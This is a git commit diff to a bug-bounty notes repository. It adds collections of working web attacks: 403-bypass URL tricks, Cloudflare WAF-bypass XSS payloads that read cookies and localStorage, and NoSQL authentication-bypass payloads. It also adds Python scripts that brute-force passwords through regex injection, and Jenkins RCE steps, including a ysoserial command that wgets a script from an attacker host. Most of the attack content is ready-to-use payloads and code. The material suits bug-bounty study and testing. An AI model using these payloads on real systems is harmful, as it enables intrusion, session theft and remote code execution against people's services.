Major Update, adding some tips
Muhammad Daffa
parent
a71bcdd231
commit
338475aee1
|
|
@ -1,5 +1,11 @@
|
|||
# 403 Forbidden Bypass
|
||||
|
||||
## Tools
|
||||
|
||||
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
|
||||
|
||||
|
||||
## Exploit
|
||||
1. Using "X-Original-URL" header
|
||||
```
|
||||
GET /admin HTTP/1.1
|
||||
|
|
@ -21,15 +27,18 @@ Try this to bypass
|
|||
http://target.com/%2e/admin => 200
|
||||
```
|
||||
|
||||
3. Try add dot (.) and slash (/) in the URL
|
||||
3. Try add dot (.) slash (/) and semicolon (;) in the URL
|
||||
```
|
||||
http://target.com/admin => 403
|
||||
```
|
||||
Try this to bypass
|
||||
```
|
||||
http://target.com/admin/. => 200
|
||||
http://target.com//admin// => 200
|
||||
http://target.com/./admin/./ => 200
|
||||
http://target.com/secret/. => 200
|
||||
http://target.com//secret// => 200
|
||||
http://target.com/./secret/.. => 200
|
||||
http://target.com/;/secret => 200
|
||||
http://target.com/.;/secret => 200
|
||||
http://target.com//;//secret => 200
|
||||
```
|
||||
|
||||
4. Add "..;/" after the directory name
|
||||
|
|
@ -58,4 +67,6 @@ Host: victim.com
|
|||
X-Original-URL: /admin
|
||||
```
|
||||
|
||||
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||
Source:
|
||||
- [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
|
||||
|
|
|
|||
|
|
@ -336,5 +336,50 @@ javascript://%250Aalert(1)
|
|||
<!--><svg onload=alert(1)-->
|
||||
```
|
||||
|
||||
## Bypass WAF
|
||||
1. Cloudflare
|
||||
```
|
||||
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||
|
||||
<svg onload=alert%26%230000000040"")>
|
||||
|
||||
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||
<svg onx=() onload=(confirm)(1)>
|
||||
|
||||
<svg onx=() onload=(confirm)(document.cookie)>
|
||||
|
||||
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
||||
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
|
||||
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||
|
||||
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||
|
||||
"><onx=[] onmouseover=prompt(1)>
|
||||
|
||||
%2sscript%2ualert()%2s/script%2u -xss popup
|
||||
|
||||
<svg onload=alert%26%230000000040"1")>
|
||||
|
||||
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||
|
||||
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||
|
||||
<svg onload=prompt%26%230000000040document.domain)>
|
||||
|
||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||
|
||||
<svg/onrandom=random onload=confirm(1)>
|
||||
|
||||
<video onnull=null onmouseover=confirm(1)>
|
||||
|
||||
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||
|
||||
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||
|
||||
<img ignored=() src=x onerror=prompt(1)>
|
||||
```
|
||||
|
||||
Reference:
|
||||
- [Brute Logic](https://brutelogic.com.br/)
|
||||
|
|
@ -1,14 +1,14 @@
|
|||
# Broken Link Hijacking
|
||||
## **Introduction**
|
||||
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
|
||||
|
||||
## **How to Find**
|
||||
## Tools
|
||||
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
|
||||
|
||||
## Definition
|
||||
Broken Link Hijacking exists whenever a target links to an expired domain or page
|
||||
|
||||
## How to find
|
||||
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
||||
2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
|
||||
|
||||
```
|
||||
blc -rof --filter-level 3 https://vuln.com/
|
||||
```
|
||||
2. Try using tools to find broken link, for example using tools that listed in this readme
|
||||
|
||||
References:
|
||||
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,10 @@
|
|||
# Exposed API Keys
|
||||
|
||||
## Tools
|
||||
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
|
||||
|
||||
## Definition
|
||||
Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
|
||||
|
||||
## How to exploit
|
||||
[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
|
||||
|
|
@ -1 +1,143 @@
|
|||
# Soon!
|
||||
## NoSQL injection
|
||||
|
||||
## Tools
|
||||
|
||||
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||
|
||||
## Exploit
|
||||
|
||||
### Authentication Bypass
|
||||
|
||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
|
||||
```
|
||||
in the request
|
||||
- username[$ne]=toto&password[$ne]=toto
|
||||
- login[$regex]=a.*&pass[$ne]=lol
|
||||
- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
|
||||
- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
|
||||
```
|
||||
|
||||
```json
|
||||
The output is
|
||||
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
|
||||
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||
```
|
||||
|
||||
### Extract length information
|
||||
|
||||
```json
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
```
|
||||
|
||||
### Extract data information
|
||||
|
||||
```json
|
||||
in URL
|
||||
username[$ne]=toto&password[$regex]=m.{2}
|
||||
username[$ne]=toto&password[$regex]=md.{1}
|
||||
username[$ne]=toto&password[$regex]=mdp
|
||||
|
||||
username[$ne]=toto&password[$regex]=m.*
|
||||
username[$ne]=toto&password[$regex]=md.*
|
||||
|
||||
in JSON
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
|
||||
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||
```
|
||||
|
||||
### Extract data with "in"
|
||||
|
||||
```json
|
||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||
```
|
||||
|
||||
### PHP Arbitrary Function Execution
|
||||
```json
|
||||
"user":{"$func": "var_dump"}
|
||||
```
|
||||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username="admin"
|
||||
password=""
|
||||
u="http://example.org/login"
|
||||
headers={'content-type': 'application/json'}
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|']:
|
||||
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
||||
if 'OK' in r.text or r.status_code == 302:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
### GET
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username='admin'
|
||||
password=''
|
||||
u='http://example.org/login'
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||
r = requests.get(u + payload)
|
||||
if 'Yeah' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
Another example using sleep to check vuln or not
|
||||
```
|
||||
'%2bsleep(1)%2b'
|
||||
```
|
||||
|
||||
### MongoDB Payloads
|
||||
|
||||
```bash
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
', $where: '1 == 1'
|
||||
1, $where: '1 == 1'
|
||||
{ $ne: 1 }
|
||||
', $or: [ {}, { 'a':'a
|
||||
' } ], $comment:'successful MongoDB injection'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
|
||||
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
# OAuth Misconfiguration
|
||||
1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
|
||||
2. Change Referral header to attacker(.)com while requesting OAuth.
|
||||
3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
|
||||
4. OAuth Token Re-use.
|
||||
5. Missing or broken state parameter.
|
||||
6. Lack of origin check.
|
||||
7. Open Redirection on another endpoint > Use it in redirect_uri
|
||||
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
|
||||
9. Try to remove email from the scope and add victim's email manually.
|
||||
10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
|
||||
11. Check if its leaking client_secret parameter.
|
||||
12. Go to the browser history and check if the token is there.
|
||||
24
README.md
24
README.md
|
|
@ -1,18 +1,24 @@
|
|||
# All about bug bounty
|
||||
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## List
|
||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||
- SQL Injection (SOON)
|
||||
- NoSQL Injection (SOON)
|
||||
- Local File Inclusion (SOON)
|
||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
|
||||
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
|
||||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||
- Local File Inclusion (SOON)
|
||||
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
|
||||
- SQL Injection (SOON)
|
||||
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||
|
||||
## List Bypass
|
||||
|
|
@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
|
||||
## List Framework
|
||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
|
||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
|
||||
|
||||
## Miscellaneous
|
||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||
|
|
@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
||||
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
|
||||
|
||||
## Technologies
|
||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||
|
||||
## Reconnaissance
|
||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,66 @@
|
|||
## Jenkins
|
||||
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
|
||||
|
||||
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
|
||||
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
|
||||
|
||||
```bash
|
||||
java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
|
||||
./jenkins_rce.py jenkins_ip jenkins_port payload.out
|
||||
```
|
||||
|
||||
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
|
||||
|
||||
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
|
||||
|
||||
If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
|
||||
```bash
|
||||
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
|
||||
```
|
||||
|
||||
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
|
||||
|
||||
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
|
||||
|
||||
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
|
||||
|
||||
4. CVE-2019-1003030
|
||||
|
||||
How to Exploit:
|
||||
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
|
||||
|
||||
```
|
||||
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
|
||||
public x(){
|
||||
"ping -c 1 xx.xx.xx.xx".execute()
|
||||
}
|
||||
} HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
```
|
||||
URL Encoding the following for RCE
|
||||
```
|
||||
public class x {
|
||||
public x(){
|
||||
"ping -c 1 xx.xx.xx.xx".execute()
|
||||
}
|
||||
}
|
||||
```
|
||||
to
|
||||
|
||||
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
|
||||
|
||||
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
|
||||
|
||||
How to exploit:
|
||||
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
|
||||
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
|
||||
|
||||
Reference:
|
||||
- https://github.com/gquere/pwn_jenkins
|
||||
|
|
@ -60,3 +60,6 @@ Connection: close
|
|||
```
|
||||
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
|
||||
```
|
||||
|
||||
Reference:
|
||||
- https://twitter.com/harshbothra
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
# Moodle
|
||||
|
||||
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
|
||||
```
|
||||
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
|
||||
```
|
||||
|
||||
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
|
||||
|
||||
```
|
||||
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
|
||||
```
|
||||
Loading…
Reference in New Issue